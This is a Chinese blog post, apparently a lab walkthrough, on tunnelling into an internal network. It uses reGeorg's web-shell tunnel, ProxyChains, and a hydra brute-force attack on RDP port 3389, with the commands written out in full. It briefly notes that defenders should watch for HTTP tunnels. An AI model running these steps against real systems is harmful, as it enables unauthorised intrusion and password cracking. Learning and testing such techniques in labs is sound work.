reGeorg+Proxchains实现内网穿透(附搭建环境超详细)

项目地址:https://github.com/sensepost/reGeorg

https://github.com/rofl0r/proxychains-ng

HTTP/HTTPS 协议

HTTP Service代理用于将所有的流量转发到内网。常见的代理工具有reGeorg、meterpreter.tunna等。

reGeorg是reDuh的升级版,主要功能是把内网服务器端口的数据通过HTTP/HTTPS隧道转发到本机,实现基于HTTP协议的通信。reGeorg 脚本的特征非常明显,很多杀毒软件都会对其进行查杀。r

如图所示,reGeorg 支持ASPX、PHP、 JSP等Web脚本,并特别提供了一个TomcatS版本。
在这里插入图片描述

环境配置

在这里插入图片描述

将脚本文件上传到目标服务器中,使用Kai Limux 在本地访问远程服务器上的tunnel.nosocket.php文件。返回后,利用reGcorgSocksProxy.py脚本监听本地的9999端口,即可建立一一个通信链路。输人如下命令,查看本地端口,可以发现9999端口已经开启了,如图所示。

因为我这里的跳板机web服务器是PHP脚本语言,所以选的php文件上传

上传到跳板机上访问这个文件,显示必须是Georg says, 'All seems fine'才表明是可用的!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

在这里插入图片描述

如果选另一个,则是不行的

如果强迫要用tunnel.php这个文件的话,web服务器要tomcat才行(http://localhost:8080/tunnel.php)
在这里插入图片描述
在host上执行命令

python reGeorgSocksProxy.py -p 9999 -u http://192.168.100.12/tunnel.nosocket.php

在这里插入图片描述

隧道正常工作之后,可以在本地Kali Linux机器上使用ProxyChains之类的工具,访向目标内网中的资源。

git clone https://github.com/rofl0r/proxychains-ng
vi /etc/proxychains.conf
socks5  192.168.1.34 9999

在这里插入图片描述
在这里插入图片描述
如果用浏览器的话,设置sock5
在这里插入图片描述
kali访问内网成功
在这里插入图片描述

配置ProxyChains,如图3-83所示。ProxyChains 的使用方法会在后面详细讲解。

传统的Web服务器通常不会将本地的3389端口开放到公网,攻击者的暴力破解行为也很容易被传统的安全设备捕获。但是,如果使用HTTP隧道进行端口转发,不仅攻击者可以直接访问Web服务器的3389端口,而且暴力破解所产生的流量的特征也不明显。因此,在日常网络维护中,需要监控HTTP隧道的情况,及时发现问题。

在本地调用hydra对Web服务器的3389端口进行暴力破解的过程,如图所示。

proxychains hydra -s 3389 -v -l administrator -P /opt/c33/1.txt -t 16 192.168.200.7

总结一下,这个reGeorg

整整花了我一天时间排错
python老是报错,
实际上这个工具不难用,难的是环境配置,
注意查看日志,然后排错
在这里插入图片描述

参考文章
https://blog.csdn.net/weixin_30245867/article/details/98036505
https://www.fujieace.com/penetration-test/regeorg-proxifier.html
https://bbs.ichunqiu.com/thread-12514-1-1.html

  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值